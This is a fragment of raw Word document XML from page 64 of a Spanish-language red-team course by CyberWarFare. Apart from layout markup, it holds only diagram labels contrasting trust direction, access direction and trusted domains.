                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="47A3A46D" id="Group 239" o:spid="_x0000_s1026" style="position:absolute;margin-left:81.1pt;margin-top:19.1pt;width:798.15pt;height:503.8pt;z-index:-17952256;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="101365,6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">
                <v:shape id="Image 240" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:101361;height:6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">
                  <v:imagedata r:id="rId97" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 241" o:spid="_x0000_s1028" style="position:absolute;left:27995;top:23011;width:46768;height:12103;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4676775,12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" path="m4152138,1165606r-3600450,l551688,1133856r-76200,38100l551688,1210056r,-31750l4152138,1178306r,-12700xem4676775,38100r-12700,-6350l4600575,r,31750l,31750,,44450r4600575,l4600575,76200r63500,-31750l4676775,38100xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 242" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:22752;top:2764;width:5728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">
                  <v:imagedata r:id="rId98" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB7586" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC84448" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F07D9D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0FA277" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED86C12" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB6DB42" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05066253" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F6BA7B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745CE097" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A20EDE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="193"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C528F4E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="7322"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8D352D" wp14:editId="163E0998">
                <wp:extent cx="2880360" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="5714" b="6350"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5951F086" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58"/>
                              <w:ind w:left="1248"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Dirección de la confianza</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7A8D352D" id="Textbox 243" o:spid="_x0000_s1134" type="#_x0000_t202" style="width:226.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5951F086" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58"/>
                        <w:ind w:left="1248"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Dirección de la confianza</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="16507084" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F92EE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408826AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4240E336" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E596E13" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E0B87A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6311F789" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43522D18" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4298C1E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="100"/>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35968" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6502C4A3" wp14:editId="363E98CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4703064</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>240204</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="306705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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306705"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0D1B1603" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="1156"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Dirección de acceso</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6502C4A3" id="Textbox 244" o:spid="_x0000_s1135" type="#_x0000_t202" style="position:absolute;margin-left:370.3pt;margin-top:18.9pt;width:226.8pt;height:24.15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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0D1B1603" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="1156"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Dirección de acceso</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="79532F4D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074A9742" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5399833C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434C80D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F7B575" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F9454A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E3DE0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="42"/>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36480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A78C66B" wp14:editId="2660B776">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2031492</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>203680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="16D5F76D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="1335"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Dominio de confianza</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1A78C66B" id="Textbox 245" o:spid="_x0000_s1136" type="#_x0000_t202" style="position:absolute;margin-left:159.95pt;margin-top:16.05pt;width:226.8pt;height:24.25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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="16D5F76D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="1335"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Dominio de confianza</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36992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="676AF35F" wp14:editId="0D07649F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7717535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>203680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="759BD86C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="1303"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Dominio de confianza</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="676AF35F" id="Textbox 246" o:spid="_x0000_s1137" type="#_x0000_t202" style="position:absolute;margin-left:607.7pt;margin-top:16.05pt;width:226.8pt;height:24.25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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="759BD86C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="1303"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Dominio de confianza</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACAA572" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B39AF2D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0223FF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602BAE86" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D33010"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t>Curso del Equipo Rojo de CyberWarFare</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE78012" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId99"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="380" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42291D76"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65248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FABEAD2" wp14:editId="315C69EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1013461</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>280523</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10165080" cy="656399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5080" cy="6563995"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10165080" cy="6563995"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="248" name="Image 248"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId100" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10165077" cy="6563751"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="249" name="Graphic 249"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3901438" y="2986932"/>
                            <a:ext cx="2230120" cy="323215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2230120" h="323215">
                                <a:moveTo>
                                  <a:pt x="2068068" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="80772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="80772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="161544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="323088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161544" y="242316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="242316"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="323088"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2229611" y="161544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2068068" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
